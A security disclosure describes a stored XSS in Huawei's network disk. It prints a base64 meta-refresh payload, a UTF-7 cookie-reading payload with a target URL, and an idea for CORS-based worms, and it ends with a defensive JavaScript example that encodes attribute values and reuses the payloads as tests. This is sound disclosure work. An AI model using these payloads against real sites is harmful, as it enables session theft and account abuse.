Huawei network disk stored XSS
As per the title. Thanks @/fd.
Detailed description:
I bought a Glory 6 and tested it.
Upload a file, publish an external link for it, then modify the external link name.
The entity encoding can generate an output point.
Code Region
<meta name="keywords" content="[output point], network disk, Huawei network disk, DBank network disk, free network disk, network hard disk, Network Disk download, network storage space, cloud storage" />
There are two exploitation methods.
First, http-equiv="Refresh".
Insert the code:
Code Region
0,url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"http-equiv="Refresh".txt
Because it is a data: URL, the cookie cannot be passed. However, we found that most of Huawei's operations do not have a token, so cross-origin resource sharing (CORS) POST requests can be used to cause worms and other impact.
Second, IE only.
Use the code:
Code Region
"charset=utf-7 +AD4APA-script+AD4-alert(document.cookie)+ADw-/script+AD4-
In IE or QQ Browser (a browser using the IE kernel), open:
http://dl.vmall.com/c0iem6xdrx?V=149900454&%3Cmeta%20http-equiv%3D
This way, data such as cookies can be transmitted. The disadvantages are the browser restriction and that it behaves like a reflected XSS.
The principle is that the GET data includes <meta http-equiv>, which uses the browser's XSS filter against the page's original charset declaration.
Proof of vulnerability: As described above.
Solution: Filter more ~~
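Both link names above work only because a double quote in the name closes the content attribute of the keywords meta tag. The following is an added example, not code from the original report or from Huawei: it renders the tag with and without attribute-context encoding and lists the attributes each version yields. The function names and the fixed keyword list are assumptions made for illustration.

```javascript
// Hypothetical helpers (not Huawei code): render the keywords <meta> tag.
const ATTR_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#39;", "`": "&#96;",
};

// Encode every character that can end or confuse a quoted attribute value.
function escapeHtmlAttr(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => ATTR_ESCAPES[ch]);
}

// "Before": the link name is concatenated into the attribute as-is.
function buildKeywordsMetaRaw(linkName, keywords) {
  return `<meta name="keywords" content="${[linkName, ...keywords].join(", ")}" />`;
}

// "After": each value is encoded for the attribute context first.
function buildKeywordsMeta(linkName, keywords) {
  const content = [linkName, ...keywords].map(escapeHtmlAttr).join(", ");
  return `<meta name="keywords" content="${content}" />`;
}

// Rough attribute lister (quoted or unquoted values) used only to check
// the rendered tag; it is not a full HTML parser.
function attributeNames(tag) {
  const re = /([a-zA-Z-]+)\s*=\s*(?:"[^"]*"|[^\s"'>]+)/g;
  const names = [];
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// The two link names from the report, kept as regression inputs.
const REPORTED_NAMES = [
  '0,url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"http-equiv="Refresh".txt',
  '"charset=utf-7 +AD4APA-script+AD4-alert(document.cookie)+ADw-/script+AD4-',
];
const KEYWORDS = ["network disk", "cloud storage"]; // constructed sample list

function compareRendering() {
  return REPORTED_NAMES.map((name) => ({
    raw: attributeNames(buildKeywordsMetaRaw(name, KEYWORDS)),
    encoded: attributeNames(buildKeywordsMeta(name, KEYWORDS)),
  }));
}
```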